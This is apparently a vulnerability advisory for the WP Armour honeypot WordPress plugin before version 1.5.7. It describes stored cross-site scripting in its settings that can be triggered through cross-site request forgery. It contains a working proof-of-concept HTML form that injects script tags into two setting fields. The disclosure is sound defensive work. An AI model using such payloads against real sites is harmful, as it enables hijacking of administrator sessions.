WordPress Plugin Vulnerabilities

WP Amour < 1.5.7 - Authenticated Stored Cross-Site Scripting (XSS)

Description

The plugin did not sanitise and escape its setting fields, leading to Stored Cross-Site Scripting issues. Furthermore, the lack of CSRF checks could also allow attackers to trigger the XSS via CSRF attacks against a logged in administrator

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp-armour" method="POST">
      <input type="hidden" name="wpa_field_name" value='"><script>alert(/XSS-Field/)</script>' />
      <input type="hidden" name="wpa_error_message" value='"><script>alert(/XSS-Error/)</script>' />
      <input type="hidden" name="submit-wpa-general-settings" value="Save General Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
honeypot
Fixed in 1.5.7

References

URL
https://plugins.trac.wordpress.org/changeset?new=2463499%40honeypot&old=2448055%40honeypot

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
9.6 (critical)

Miscellaneous

Verified
Yes
WPVDB ID
fe403a7f-99ed-4cb3-9000-1d1f3cc98f1a

Timeline

Publicly Published
2021-02-08 (about 3 years ago)
Added
2021-02-08 (about 3 years ago)
Last Updated
2021-02-08 (about 3 years ago)

Other

Published
Title
Published
2022-10-24
Title
Auto Upload Images < 3.3.1 - Admin+ Stored Cross-Site Scripting
Published
2019-10-09
Title
SoundPress < 3.0.0 - Cross-Site Scripting (XSS)
Published
2023-09-04
Title
WordPress File Sharing < 2.0.4 - Admin+ Stored XSS
Published
2022-12-27
Title
WordPress Simple Shopping Cart < 4.6.2 - Contributor+ Stored XSS via Shortcode
Published
2021-11-23
Title
Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting